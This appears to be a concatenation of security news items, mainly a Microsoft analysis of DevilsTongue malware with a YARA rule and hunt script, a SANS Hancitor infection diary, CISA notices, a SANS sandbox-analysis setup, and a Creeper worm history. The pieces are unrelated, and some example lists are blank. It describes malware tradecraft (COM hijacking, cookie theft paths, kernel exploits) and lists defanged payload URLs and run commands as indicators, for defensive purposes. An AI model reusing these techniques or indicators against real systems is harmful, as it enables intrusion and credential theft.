CVE-2021-31979 fixes an integer overflow within Windows NT-based operating system (NTOS). This overflow results in an incorrect buffer size being calculated, which is then used to allocate a buffer in the kernel pool. A buffer overflow subsequently occurs while copying memory to the smaller-than-expected destination buffer. This vulnerability can be leveraged to corrupt an object in an adjacent memory allocation. Using APIs from user mode, the kernel pool memory layout can be groomed with controlled allocations, resulting in an object being placed in the adjacent memory location. Once corrupted by the buffer overflow, this object can be turned into a user mode to kernel mode read/write primitive. With these primitives in place, an attacker can then elevate their privileges.

CVE-2021-33771 addresses a race condition within NTOS resulting in the use-after-free of a kernel object. By using multiple racing threads, the kernel object can be freed, and the freed memory reclaimed by a controllable object. Like the previous vulnerability, the kernel pool memory can be sprayed with allocations using user mode APIs with the hopes of landing an object allocation within the recently freed memory. If successful, the controllable object can be used to form a user mode to kernel mode read/write primitive and elevate privileges.

DevilsTongue malware overview

DevilsTongue is a complex modular multi-threaded piece of malware written in C and C++ with several novel capabilities. Analysis is still on-going for some components and capabilities, but we’re sharing our present understanding of the malware so defenders can use this intelligence to protect networks and so other researchers can build on our analysis.

For files on disk, PDB paths and PE timestamps are scrubbed, strings and configs are encrypted, and each file has a unique hash. The main functionality resides in DLLs that are encrypted on disk and only decrypted in memory, making detection more difficult. Configuration and tasking data is kept separate from the malware, which makes analysis harder. DevilsTongue has both user mode and kernel mode capabilities. There are several novel detection evasion mechanisms built in. All these features are evidence that SOURGUM developers are very professional, have extensive experience writing Windows malware, and have a good understanding of operational security.

When the malware is installed, a first-stage ‘hijack’ malware DLL is dropped in a subfolder of C:\Windows\system32\IME; the folders and names of the hijack DLLs blend with legitimate names in the IME directories. Encrypted second-stage malware and config files are dropped into subfolders of C:\Windows\system32\config with a .dat file extension. A third-party legitimate, signed driver physmem.sys is dropped to the system32 folder. A file called WimBootConfigurations.ini is also dropped; this file has the command for following the COM hijack. Finally, the malware adds the hijack DLL to a COM class registry key, overwriting the legitimate COM DLL path that was there, achieving persistence via COM hijacking.

From the COM hijacking, the DevilsTongue first-stage hijack DLL gets loaded into a svchost.exe process to run with SYSTEM permissions. The COM hijacking technique means that the original DLL that was in the COM registry key isn’t loaded. This can break system functionality and trigger an investigation that could lead to the discovery of the malware, but DevilsTongue uses an interesting technique to avoid this. In its DllMain function it calls LoadLibrary on the original COM DLL so it is correctly loaded into the process. DevilsTongue then searches the call stack to find the return address of LoadLibraryExW (i.e., the function currently loading the DevilsTongue DLL),  which would usually return the base address of the DevilsTongue DLL.

Once the LoadLibraryExW return address has been found, DevilsTongue allocates a small buffer with shellcode that puts the COM DLL’s base address (imecfmup.7FFE49060000 in Figure 1) into the rax register and then jumps to the original return address of LoadLibraryExW (svchost.7FF78E903BFB in Figures 1 and 2). In Figure 1 the COM DLL is named imecfmup rather than a legitimate COM DLL name because some DevilsTongue samples copied the COM DLL to another location and renamed it.

Figure 1. DevilsTongue return address modification shellcode

DevilsTongue then swaps the original LoadLibraryExW return address on the stack with the address of the shellcode so that when LoadLibraryExW returns it does so into the shellcode (Figures 2 and 3). The shellcode replaces the DevilsTongue base address in rax with the COM DLL’s base address, making it look like LoadLibraryExW has returned the COM DLL’s address. The svchost.exe host process now uses the returned COM DLL base address as it usually would.

Figure 2. Call stack before stack swap, LoadLibraryExW in kernelbase returning to svchost.exe (0x7FF78E903BFB)

Figure 3. Call stack after stack swap, LoadLibraryExW in kernelbase returning to the shellcode address (0x156C51E0000 from Figure 1)

This technique ensures that the DevilsTongue DLL is loaded by the svchost.exe process, giving the malware persistence, but that the legitimate COM DLL is also loaded correctly so there’s no noticeable change in functionality on the victim’s systems.

After this, the hijack DLL then decrypts and loads a second-stage malware DLL from one of the encrypted .dat files. The second-stage malware decrypts another .dat file that contains multiple helper DLLs that it relies on for functionality.

DevilsTongue has standard malware capabilities, including file collection, registry querying, running WMI commands, and querying SQLite databases. It’s capable of stealing victim credentials from both LSASS and from browsers, such as Chrome and Firefox. It also has dedicated functionality to decrypt and exfiltrate conversations from the Signal messaging app.

It can retrieve cookies from a variety of web browsers. These stolen cookies can later be used by the attacker to sign in as the victim to websites to enable further information gathering. Cookies can be collected from these paths (* is a wildcard to match any folders):

%LOCALAPPDATA%\Chromium\User Data\*\Cookies
%LOCALAPPDATA%\Google\Chrome\User Data\*\Cookies
%LOCALAPPDATA%\UCBrowser\User Data_i18n\*\Cookies.9
%LOCALAPPDATA%\Yandex\YandexBrowser\User Data\*\Cookies
%APPDATA%\Apple Computer\Safari\Cookies\Cookies.binarycookies
%APPDATA%\Opera Software\Opera Stable\Cookies

Interestingly, DevilsTongue seems able to use cookies directly from the victim’s computer on websites such as Facebook, Twitter, Gmail, Yahoo, Odnoklassniki, and Vkontakte to collect information, read the victim’s messages, and retrieve photos. DevilsTongue can also send messages as the victim on some of these websites, so that it appears to any recipient that the victim sent these messages. The capability to send messages could be weaponized to send malicious links to more victims.

Alongside DevilsTongue a third-party signed driver is dropped to C:\Windows\system32\physmem.sys. The driver’s description is “Physical Memory Access Driver,” and it appears to offer a “by-design” kernel read/write capability. This appears to be abused by DevilsTongue to proxy certain API calls via the kernel to hinder detection, including the capability to have some of the calls appear from other processes. Functions capable of being proxied include CreateProcessW, VirtualAllocEx, VirtualProtectEx, WriteProcessMemory, ReadProcessMemory, CreateFileW and RegSetKeyValueW.

Prevention and detection

To prevent compromise from browser exploits, it’s recommended to use an isolated environment, such as a virtual machine, when opening links from untrusted parties. Using a modern version of Windows 10 with virtualization-based protections, such as Credential Guard, prevents DevilsTongue’s LSASS credential-stealing capabilities. Enabling the attack surface reduction rule “Block abuse of exploited vulnerable signed drivers” in Microsoft Defender for Endpoint blocks the driver that DevilsTongue uses. Network protection blocks known SOURGUM domains.

Detection opportunities

This section is intended to serve as a non-exhaustive guide to help customers and peers in the cybersecurity industry to detect the DevilsTongue malware. We’re providing this guidance with the expectation that SOURGUM will likely change the characteristics we identify for detection in their next iteration of the malware. Given the actor’s level of sophistication, however, we believe that outcome would likely occur irrespective of our public guidance.

File locations

The hijack DLLs are in subfolders of system32\ime with names starting with ‘im’. However, they are blended with legitimate DLLs in those folders. To distinguish between the malicious and benign, the legitimate DLLs are signed (on Windows 10) whereas the DevilsTongue files aren’t. Example paths:


The DevilsTongue configuration files, which are AES-encrypted, are in subfolders of C:\Windows\system32\config and have a .dat extension. The exact paths are victim-specific, although some folder names are common across victims. As the files are AES-encrypted, any files whose size mod 16 is 0 can be considered as a possible malware config file. The config files are always in new folders, not the legitimate existing folders (e.g., on Windows 10, never in Journal, systemprofile, TxR etc.). Example paths:


Commonly reused folder names in the config file paths:


The .ini reg file has the unique name WimBootConfigurations.ini and is in a subfolder of system32\ime. Example paths:


The Physmem driver is dropped into system32 as physmem.sys:



The two COM keys that have been observed being hijacked for persistence are listed below with their default clean values. If their default value DLL is in the system32ime folder, the DLL is likely DevilsTongue.

HKLM\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 = %systemroot%\system32\wbem\wmiutils.dll (clean default value)
HKLM\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32 = %systemroot%\system32\wbem\wbemsvc.dll (clean default value)
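An added defender-side example (my own, not code from the Microsoft post) that turns the file-location and COM-key characteristics above into a read-only PowerShell hunt. Paths, the size-mod-16 rule and the clean COM values are taken from the post; the list of known-legitimate config subfolders is an assumption you should extend for your build.

```powershell
# Added example, not from the Microsoft post: a read-only hunt for the on-disk and
# registry characteristics described above. It reports findings to triage, not verdicts.
$Sys32    = Join-Path $env:SystemRoot 'System32'
$ImeDir   = Join-Path $Sys32 'IME'
$Findings = New-Object System.Collections.Generic.List[string]

# 1. Hijack DLLs: 'im*.dll' under System32\IME that carry no valid signature
#    (legitimate IME DLLs are signed on Windows 10; catalog signatures count as Valid here)
Get-ChildItem -LiteralPath $ImeDir -Recurse -File -Filter 'im*.dll' -ErrorAction SilentlyContinue |
    ForEach-Object {
        $sig = Get-AuthenticodeSignature -FilePath $_.FullName
        if ($sig.Status -ne 'Valid') {
            $Findings.Add("Unsigned IME DLL: $($_.FullName) [$($sig.Status)]")
        }
    }

# 2. The COM-hijack .ini in an IME subfolder, and the physmem driver in System32
Get-ChildItem -LiteralPath $ImeDir -Recurse -File -Filter 'WimBootConfigurations.ini' -ErrorAction SilentlyContinue |
    ForEach-Object { $Findings.Add("WimBootConfigurations.ini present: $($_.FullName)") }
$Physmem = Join-Path $Sys32 'physmem.sys'
if (Test-Path -LiteralPath $Physmem) { $Findings.Add("physmem.sys present: $Physmem") }

# 3. AES-encrypted configs: .dat files whose size is a multiple of 16, located in
#    subfolders of System32\config other than the legitimate ones the post names
$LegitConfigDirs = @('Journal', 'systemprofile', 'TxR')   # from the post; assumption: extend for your build
Get-ChildItem -LiteralPath (Join-Path $Sys32 'config') -Directory -ErrorAction SilentlyContinue |
    Where-Object { $LegitConfigDirs -notcontains $_.Name } |
    Get-ChildItem -Recurse -File -Filter '*.dat' -ErrorAction SilentlyContinue |
    Where-Object { $_.Length -gt 0 -and ($_.Length % 16) -eq 0 } |
    ForEach-Object { $Findings.Add("Possible encrypted config: $($_.FullName) ($($_.Length) bytes)") }

# 4. The two COM keys observed hijacked, compared with their clean default values
$CleanCom = @{
    'HKLM:\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32' = '%systemroot%\system32\wbem\wmiutils.dll'
    'HKLM:\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32' = '%systemroot%\system32\wbem\wbemsvc.dll'
}
foreach ($key in $CleanCom.Keys) {
    # Get-ItemProperty expands REG_EXPAND_SZ values, so expand the clean value too before comparing
    $current  = (Get-ItemProperty -LiteralPath $key -Name '(default)' -ErrorAction SilentlyContinue).'(default)'
    $expected = [Environment]::ExpandEnvironmentVariables($CleanCom[$key])
    if ($null -eq $current) { continue }
    if ($current -like '*\system32\ime\*') {
        $Findings.Add("COM key points into IME (likely DevilsTongue): $key = $current")
    } elseif ($current -ne $expected) {
        $Findings.Add("COM key differs from clean default: $key = $current")
    }
}

if ($Findings.Count -eq 0) { 'No DevilsTongue file or registry characteristics found.' } else { $Findings }
```

Run it from an elevated PowerShell prompt; an unsigned IME DLL together with a COM key pointing into the IME folder is the combination the post describes, while a lone .dat hit needs manual review.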

File content and characteristics

This Yara rule can be used to find the DevilsTongue hijack DLL:

import "pe"

rule DevilsTongue_HijackDll
{
    meta:
        description = "Detects SOURGUM's DevilsTongue hijack DLL"
        author = "Microsoft Threat Intelligence Center (MSTIC)"
        date = "2021-07-15"
    strings:
        $str1 = "windows.old\\windows" wide
        $str2 = "NtQueryInformationThread"
        $str3 = "dbgHelp.dll" wide
        $str4 = "StackWalk64"
        $str5 = "ConvertSidToStringSidW"
        $str6 = "S-1-5-18" wide
        $str7 = "SMNew.dll" // DLL original name
        // Call check in stack manipulation
        // B8 FF 15 00 00   mov     eax, 15FFh
        // 66 39 41 FA      cmp     [rcx-6], ax
        // 74 06            jz      short loc_1800042B9
        // 80 79 FB E8      cmp     byte ptr [rcx-5], 0E8h ; 'è'
        $code1 = {B8 FF 15 00 00 66 39 41 FA 74 06 80 79 FB E8}
        // PRNG to generate number of times to sleep 1s before exiting
        // 44 8B C0          mov  r8d, eax
        // B8 B5 81 4E 1B    mov  eax, 1B4E81B5h
        // 41 F7 E8          imul r8d
        // C1 FA 05          sar  edx, 5
        // 8B CA             mov  ecx, edx
        // C1 E9 1F          shr  ecx, 1Fh
        // 03 D1             add  edx, ecx
        // 69 CA 2C 01 00 00 imul ecx, edx, 12Ch
        // 44 2B C1          sub  r8d, ecx
        // 45 85 C0          test r8d, r8d
        // 7E 19             jle  short loc_1800014D0
        $code2 = {44 8B C0 B8 B5 81 4E 1B 41 F7 E8 C1 FA 05 8B CA C1 E9 1F 03 D1 69 CA 2C 01 00 00 44 2B C1 45 85 C0 7E 19}
    condition:
        filesize < 800KB and
        uint16(0) == 0x5A4D and
        (pe.characteristics & pe.DLL) and
        (
            4 of them or
            ($code1 and $code2) or
            (pe.imphash() == "9a964e810949704ff7b4a393d9adda60")
        )
}

Microsoft Defender Antivirus detections

Microsoft Defender Antivirus detects DevilsTongue malware with the following detections:


Microsoft Defender for Endpoint alerts

Alerts with the following titles in the security center can indicate DevilsTongue malware activity on your network:

COM Hijacking
Possible theft of sensitive web browser information
Stolen SSO cookies 

Azure Sentinel query

To locate possible SOURGUM activity using Azure Sentinel, customers can find a Sentinel query containing these indicators in this GitHub repository.

Indicators of compromise (IOCs)

No malware hashes are being shared because DevilsTongue files, except for the third-party driver below, all have unique hashes and are therefore not a useful indicator of compromise.

Physmem driver

Note that this driver may be used legitimately, but if it’s seen on path C:\Windows\system32\physmem.sys then it is a high-confidence indicator of DevilsTongue activity. The hashes below are provided for the one driver observed in use.

MD5: a0e2223868b6133c5712ba5ed20c3e8a
SHA-1: 17614fdee3b89272e99758983b99111cbb1b312c
SHA-256: c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d



The post Protecting customers from a private-sector offensive actor using 0-day exploits and DevilsTongue malware appeared first on Microsoft Security Blog.


On Thursday 2021-07-08, for a short while when Hancitor was initially active, if any victims clicked on a malicious link from the malspam, they would receive an XLL file instead of a malicious Word doc.  I tried one of the email links in my lab and received the malicious XLL file.  After other researchers reported they were receiving Word documents, I tried a few hours later and received a Word document instead.

Shown above:  Flow chart for my first Hancitor infection on 2021-07-08.

Since November 2020, Hancitor has consistently followed specific patterns of infection activity, and my previous diary from January 2021 is typical of what I’ve seen.  Only one change has happened recently.  Since June 8th 2021, malicious spam (malspam) pushing Hancitor switched from links in their messages to using URLs, which was initially reported by @James_inthe_box, @mesa_matt, and @executemalware.

Shown above:  Flow chart for my second Hancitor infection on 2021-07-08 (what I normally see).

I’ve also seen these Google feedproxy URLs used for Hancitor infections, but I had not seen the XLL files until now.

What is an XLL file?

XLL files are Excel add-in files.  They’re DLL files specifically designed to be run by Microsoft Excel.  Think of an XLL file as an “Excel DLL.”

The emails

As usual, emails for this wave of Hancitor used a DocuSign theme, and they spoofed cabanga[.]com as the sending domain.  Just like in recent weeks, links went to a Google feedproxy URL.

Shown above:  Example of malspam pushing Hancitor from 2021-07-08.

The Google feedproxy URL leads to a malicious page on a compromised website designed to send the initial malicious file and redirect the browser to DocuSign’s website.  I’ve described the process here and here.  This process makes it appear as if the file was offered by DocuSign, when it was actually sent through a malicious web page.

Shown above:  The website for DocuSign appears in a victim’s browser immediately after a malicious file is offered for download.

Remember, this malicious activity is not caused by DocuSign.  DocuSign is one of many companies that cybercriminals impersonate when distributing malware like Hancitor.  DocuSign is aware of this long-running effort by the criminals behind Hancitor, and the company has guidelines for dealing with this sort of malicious activity.

Running the XLL

When opening the XLL file, Excel asks if you want to enable the add-in as shown below.

Shown above:  Opening the malicious XLL file in Excel.

The default option was to leave the add-in disabled.  But when I opened the XLL file in my lab environment, I enabled all code for the add-in.  Excel immediately ran the add-in and closed.  I didn’t see any sort of fake template like we usually see when Hancitor uses a Word document as the initial file.

Infection traffic

During my first infection run with the XLL file, most of the traffic followed known patterns for Hancitor and Cobalt Strike, but I saw two additional URLs as noted below.

Shown above: Traffic from my first Hancitor infection filtered in Wireshark, with the two unusual URLs noted.

These two URLs returned files that were saved to my Windows client in the C:\Users\Public directory.  The first URL returned an HTML file that was saved as res32.hta.  That .hta file retrieved an EXE for Hancitor, which was saved as snd32sys.exe.

Shown above:  HTML (.hta) and EXE files saved to the Windows host.

Hancitor showed a build number of 0707in2_wvcr in C2 traffic caused by the EXE.  During my second infection run with a Hancitor DLL, I saw a build number of 0707_wvcr.

Shown above:  C2 traffic from Hancitor EXE during my first infection.

Shown above:  C2 traffic from Hancitor DLL during my second infection.

Indicators of Compromise (IOCs)

This Github page contains 35 Google feedproxy URLs and 35 associated URLs used to send the initial malicious file.  Other indicators follow.

SHA256 hash: 73b8c566d8cdf3200daa0b698b9d32a49b1ea8284a1e6aa6408eb9c9daaacb71

File size: 24,488 bytes
File name: 0708_0112181856.xll
File description: Excel add-in (an “Excel DLL”)

SHA256 hash: da92436d2bbcdef52b11ace6e2e063e9971cefc074d194550bd425305c97cdd5

File size: 8,419 bytes
File location: hxxp://srand04rf[.]ru/92375234.xml
File location: C:\Users\Public\res32.hta
File description: HTML file used to retrieve Hancitor EXE

SHA256 hash: 3db14214a9eb98b3b5abffcb314c808a25ed82456ce01251d31e8ea960f6e4e6

File size: 763,392 bytes
File location: hxxp://srand04rf[.]ru/08.jpg
File location: C:\Users\Public\snd32sys.exe
File description: Hancitor EXE

SHA256 hash: b4d402b4ab3b5a5568f35562955d5d05357a589ccda55fde5a2c166ef5f15699

File size: 898,048 bytes
File name: 0708_3355614568218.doc
File description: Word doc with macros for Hancitor

SHA256 hash: 4dc9d5ee1debdba0388fbb112d4bbbc01bb782f015e798cced3fc2edb17ac557

File size: 274,432 bytes
File location: C:\Users\[username]\AppData\Roaming\Microsoft\Template\niberius.dll
File description: Hancitor DLL
Run method: rundll32.exe [filename],ONOQWPYIEIR

SHA256 hash: dee4bb7d46bbbec6c01dc41349cb8826b27be9a0dcf39816ca8bd6e0a39c2019

File size: 272,910 bytes
File location: hxxp://srand04rf[.]ru/7hfjsdfjks.exe
File description: EXE for Ficker Stealer malware
Note: This file was first submitted to VirusTotal on 2021-06-09.

Traffic related to Hancitor:


Traffic related to Ficker Stealer:


Traffic related to Cobalt Strike:


Final words

A pcap of the infection traffic from my first infection run (with the XLL file) can be found here.

Brad Duncan
brad [at]

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.


Original release date: July 7, 2021 | Last revised: July 8, 2021

CISA has published a new [Malware Analysis Report (MAR) on DarkSide Ransomware] and updated Alert AA21-131A: DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks, originally released May 11, 2021. This update adds indicators of compromise associated with a DarkSide ransomware variant that executes a dynamic-link library used to delete Volume Shadow copies available on the system.

CISA encourages users and administrators to review the following resources for more information:

AA21-131A: DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks
Malware Analysis Report MAR-10337801-1.v1

This product is provided subject to this Notification and this Privacy & Use policy.



Safe at home, apparently, but not so safe overseas.

By Asheer Malhotra, Justin Thattil and Kendall McKay.

Transparent Tribe, also known as APT36 and Mythic Leopard, continues to create fake domains mimicking legitimate military and defense organizations as a core component of their operations. Cisco Talos’ previous research has mainly linked this…



Original release date: April 22, 2021

CISA has released AR21-112A: CISA Identifies SUPERNOVA Malware During Incident Response to provide analysis of a compromise in an organization’s enterprise network by an advanced persistent threat actor. This report provides tactics, techniques, and procedures CISA observed during the incident response engagement.

CISA encourages organizations to review AR21-112A for more information.




Original release date: April 15, 2021

CISA and the Department of Defense (DoD) Cyber National Mission Force (CNMF) have analyzed additional SolarWinds-related malware variants—referred to as SUNSHUTTLE and SOLARFLARE. One of the analyzed files was identified as a China Chopper webshell server-side component that was observed on a network with an active SUNSHUTTLE infection. The webshell can provide a cyber threat actor an alternative method of accessing a network, even if the SUNSHUTTLE infection was remediated.

The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR).

CISA encourages users and administrators to review Malware Analysis Report MAR-10327841-1.v1, U.S. Cyber Command’s VirusTotal page, and the following resources for more information: 

CISA web page: Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise
CISA web page: Supply Chain Compromise
CISA Alert AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations


Microsoft describes the configuration files as follows: “Windows Sandbox supports simple configuration files, which provide a minimal set of customization parameters for Sandbox. […] Windows Sandbox configuration files are formatted as XML and are associated with Sandbox via the .wsb file extension.”[6]

Since the latest version of the elastic-agent (7.11+) supports antivirus detection, I followed the instructions listed here [1] to configure an agent and test its detection capabilities. For my workstation, I used VMware with a fully patched Windows 10 and saved the current configuration with a snapshot. I wanted to combine both of these features, the elastic-agent and the Microsoft sandbox feature [4][5][6], to analyze my malware sample. Since the Microsoft sandbox doesn’t retain anything after it is shut down, I figured this would be a good alternative to restoring my previous VMware snapshot every time I tested a suspicious file.

One minor inconvenience: if I want to use the agent, I need to add it to Elasticsearch every time. If the elastic-agent isn’t installed, Microsoft Defender is enabled. Here is a list of tools to install, or consider installing, in the sandbox when it starts:

Elastic-agent with malware policy (in VMware client and Sandbox client)
MS SysMon
Consider adding: PowerShell Script Block Logging, example here
Wireshark to capture traffic from host
Other browsers: Chrome & Firefox
Internet Services Simulation Suite: INetSim
Didier Stevens suite of tools
Proxy setup on VMware client to monitor traffic
Any other tools you might find useful during the analysis such as this package by @mentebinaria

When the sandbox is started with a configuration script written for this purpose (MalwareAnalysis.wsb), it can automatically load the needed tools with a batch file. Here is my example:


Because everything is deleted when you shut down the sandbox (including the browser, which must be reloaded with the current version every time), I needed a way to automatically start, add, load and update what I needed to perform some basic analysis. I use a batch file preconfigured with everything I need to accomplish this task. Here is what I have (C:\Sandbox\SBConfig.bat):

REM Copy elastic-agent to C:\Program Files
C:\Windows\System32\xcopy.exe /i /s C:\Users\WDAGUtilityAccount\Desktop\Sandbox\elastic-agent "C:\Program Files\elastic-agent"

REM Install Sysmon64, vcredist_x86
C:\Users\WDAGUtilityAccount\Desktop\Sandbox\Sysmon64.exe -i -accepteula
C:\Users\WDAGUtilityAccount\Desktop\Sandbox\vcredist_x86.exe /q

REM Add Elastic certificate authority to Sandbox
C:\Windows\System32\certutil.exe -addstore root C:\Users\WDAGUtilityAccount\Desktop\Sandbox\ca.crt
C:\Windows\System32\certutil.exe -addstore root C:\Users\WDAGUtilityAccount\Desktop\Sandbox\stargate.crt

REM Install new Microsoft Edge
start /wait C:\Users\WDAGUtilityAccount\Desktop\Sandbox\MicrosoftEdgeEnterpriseX64.msi /quiet /norestart

REM Install Python
C:\Users\WDAGUtilityAccount\Desktop\Sandbox\python-3.9.2-amd64.exe /quiet InstallAllUsers=1 PrependPath=1 Include_test=0

REM Execute PowerShell scripts
Powershell.exe -executionpolicy remotesigned -File C:\Users\WDAGUtilityAccount\Desktop\Sandbox\ChangeExecutionPolicy.ps1
Powershell.exe -executionpolicy remotesigned -File C:\Users\WDAGUtilityAccount\Desktop\Sandbox\ScriptBlockLogging.ps1

REM Install Wireshark
REM Install npcap manually. Silent only supported with OEM
C:\Users\WDAGUtilityAccount\Desktop\Sandbox\Wireshark-win64-3.4.4.exe /S /D /desktopicon=yes
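An added example of the .wsb side of this setup (my own illustration, not the author's MalwareAnalysis.wsb): a PowerShell snippet that writes a Windows Sandbox configuration mapping a read-only host tool folder to the path the batch file above expects and running that batch file at logon. The host folder C:\Sandbox, the memory size and the disabled redirections are assumptions.

```powershell
# Added example, not the author's file: generate and launch a Windows Sandbox profile.
# Assumptions: tools live in C:\Sandbox on the host and must appear inside the sandbox at
# C:\Users\WDAGUtilityAccount\Desktop\Sandbox, the location SBConfig.bat is written for.
$HostToolDir = 'C:\Sandbox'
$SandboxDir  = 'C:\Users\WDAGUtilityAccount\Desktop\Sandbox'
$WsbPath     = Join-Path $HostToolDir 'MalwareAnalysis.wsb'

$wsb = @"
<Configuration>
  <!-- No vGPU, no clipboard/printer sharing: fewer channels between sample and host -->
  <VGpu>Disable</VGpu>
  <Networking>Default</Networking>
  <ClipboardRedirection>Disable</ClipboardRedirection>
  <PrinterRedirection>Disable</PrinterRedirection>
  <ProtectedClient>Enable</ProtectedClient>
  <MemoryInMB>4096</MemoryInMB>
  <MappedFolders>
    <MappedFolder>
      <HostFolder>$HostToolDir</HostFolder>
      <SandboxFolder>$SandboxDir</SandboxFolder>
      <!-- Read-only: the sample cannot tamper with the tools or write back to the host -->
      <ReadOnly>true</ReadOnly>
    </MappedFolder>
  </MappedFolders>
  <LogonCommand>
    <!-- Runs once the sandbox desktop is up; installs agent, Sysmon, CA certs, etc. -->
    <Command>$SandboxDir\SBConfig.bat</Command>
  </LogonCommand>
</Configuration>
"@

# Windows Sandbox refuses to start on a malformed file, so parse it before writing it out
[xml]$parsed = $wsb
if ($parsed.Configuration.MappedFolders.MappedFolder.ReadOnly -ne 'true') {
    throw 'Mapped tool folder must be read-only'
}
Set-Content -Path $WsbPath -Value $wsb -Encoding UTF8

# Double-clicking the .wsb, or Start-Process, launches the sandbox with this profile
Start-Process -FilePath $WsbPath
```

Set Networking to Disable instead when the sample should be analysed fully offline, as the author mentions for some tasks.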

The npcap file is last because I’m using the free edition rather than the OEM one, which asks to finish the installation after the installer starts. Before ScriptBlockLogging can be enabled in the Sandbox, the PowerShell ExecutionPolicy must allow RemoteSigned. This is the command in my script that makes that change (ChangeExecutionPolicy.ps1):

Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Force

To verify the change was applied, as PowerShell admin, execute the following command:

Get-ExecutionPolicy -List

Producing the following result:

Following the example in this Elastic blog, it is time to create a policy and add the elastic-agent (pre-copied with the batch file SBConfig.bat) to Elasticsearch to run the sample file and monitor its activity. This is the four-application part of the policy I configured for my agent:

After launching the script MalwareAnalysis.wsb to start the Sandbox and load, copy and install all the applications from the batch file, it is time to add the elastic-agent to the server; then I am ready to launch the suspected malware file for analysis. Last month, a crypto miner file photo.scr was uploaded to my honeypot, and I’m going to submit this file to the elastic-agent for analysis.

To view the results in Kibana, navigate to Security -> Overview -> Detection alert trend.
I look for activity that would indicate an alert triggered by malware and filter for the value, then click View alerts to examine the flow of the activity. I can then select Analyze to see what this photo.scr file accessed or installed on the client. The agent captured 3 alerts:

Next, expand one of those alerts and analyze the activity; the elastic-agent identified 1 library, 53 network and 7 registry events:

Network Activity

Registry Activity

Each one of these can be expanded to drill further into what happened on the host.

Indicator of Compromise

807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d  Photo.scr
[2021-02-08 07:06:36] [1693] [ftp_21_tcp 29914] [] info: Stored 1578496 bytes of data



This is one of many tasks Windows Sandbox could be used for, such as accessing suspicious sites or running untrusted software and scripts, with Windows networking or the vGPU disabled, without the fear of impacting your normal Windows installation. These various tasks can be accomplished by creating separate .wsb Sandbox scripts.


Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu


Original release date: March 17, 2021

CISA and the Federal Bureau of Investigation (FBI) have released a Joint Cybersecurity Advisory (CSA) on TrickBot malware. A sophisticated group of cyber criminals are using phishing emails claiming to contain proof of traffic violations to lure victims into downloading TrickBot. TrickBot is a highly modular, multi-stage malware that provides its operators a full suite of tools to conduct a myriad of illegal cyber activities.

To secure against TrickBot, CISA and the FBI recommend users and administrators review AA21-076A: TrickBot Malware as well as CISA’s Fact Sheet: TrickBot Malware for guidance on implementing specific mitigation measures to protect against this activity.



If you have any interest in the history of malicious code, chances are you’ve heard or read somewhere that the first piece of malware ever created was a computer worm called Creeper and that spread itself through the ARPANET in 1971. Some sources even mention that it might have been on this very date, i.e. exactly 50 years ago[1].

So does malware really turn 50 today?

Not likely. Even leaving aside that according to some sources[2], there may have been a fork bomb[3] program created all the way back in 1969, and therefore the oldest malware might already be over 50 years old, the simple fact is that Creeper wasn’t malware in any sense of the word… Although it was probably the first example of a (benign) computer worm ever created.

In the multiple retellings of its legend that may be found both online and in print, we have, however, a prime example of something which is unfortunately relatively common (not just) in infosec. That is, repeating interesting-looking information without checking for any original sources, which might provide context to it. I don’t mind admitting that this is a pet peeve of mine[4] and so I thought that on this day, which may or may not mark the 50th anniversary of the original “run” of Creeper, it might be a good idea to take a look at what we really know about it.

According to the few trustworthy articles on the subject, which cite their sources[5,6], and explanations provided by Ray Tomlinson, who played a significant part in the story of Creeper[7,8], the program was created at BBN Technologies at some point in 1971. At that time, BBN was developing TENEX, an operating system for the PDP-10 computer. One of the developers of TENEX was Robert Thomas, who, among other projects, worked on what was called the Resource Sharing Executive, or RSEXEC, an experiment with what was thought of as a “mobile application” concept. RSEXEC was basically supposed to enable a program to “jump” between computers so that it would always be executed by a machine with unutilized computational resources or with the data the program needed. As you’ve probably guessed, Creeper was the demonstration program that resulted from Thomas’s work.

The original application was tested using (at most) 28 computers connected to the ARPANET and running the TENEX OS. Creeper migrated from one system to another, always “removing” itself from the machine it was leaving. What is important to note is that this was done with the full agreement and cooperation of the operators of all those computers and that the test had no negative effects on them. All that Creeper supposedly did on “visited” computers was print the famous message “I’M THE CREEPER : CATCH ME IF YOU CAN” on a teletype.

Message printed by Creeper[5]

An indeterminate amount of time later, Ray Tomlinson, who worked at BBN Technologies at the same time as Bob Thomas, created a modified version of Creeper. The program originally jumped from one machine to another, which meant that there was always only one copy of it on the entire network (computer worms which behave in this way are sometimes called “rabbits”). The new version, which was created by Tomlinson, had the ability to replicate itself, i.e. create multiple copies of itself, which might exist at the same time on different machines (meaning it behaved more like a usual computer worm). This updated version was – once again – not malicious in any way, and one may think of it as a demonstration of the concept of distributed computation more than anything else.

Since it was able to replicate itself, and it was necessary to make sure it didn’t cause any problems even in case of bugs which might make it hang, Tomlinson also created a program called Reaper. This was a simple piece of code which visited each of the approximately 28 computers that might have hosted Creeper and terminated any instances of Creeper it found running on them.

Due to this behavior, Reaper is sometimes called “the first anti-virus”[9]. Since neither version of Creeper was malicious in any way, depending on your definition of “anti-virus” this title may or may not be applicable. Reaper, however, may almost certainly be called the first “nematode” (a worm or virus which removes another worm or virus from a system on which it is present).

So, based on the history we’ve recounted, what may we say with any sort of certainty regarding the age of malware? Not much. In terms of the age of computer worms, however, chances are good that they really are turning 50 this year, whether it is today or not. It is a little bit sad that one tends to think of every computer worm as being malicious “by default”, since, as this little trip down memory lane shows us, it doesn’t necessarily have to be true…

In any case, if you’d like to learn a bit more about the origins of modern malware (and don’t mind low-quality video editing), the following video might be worth your time.


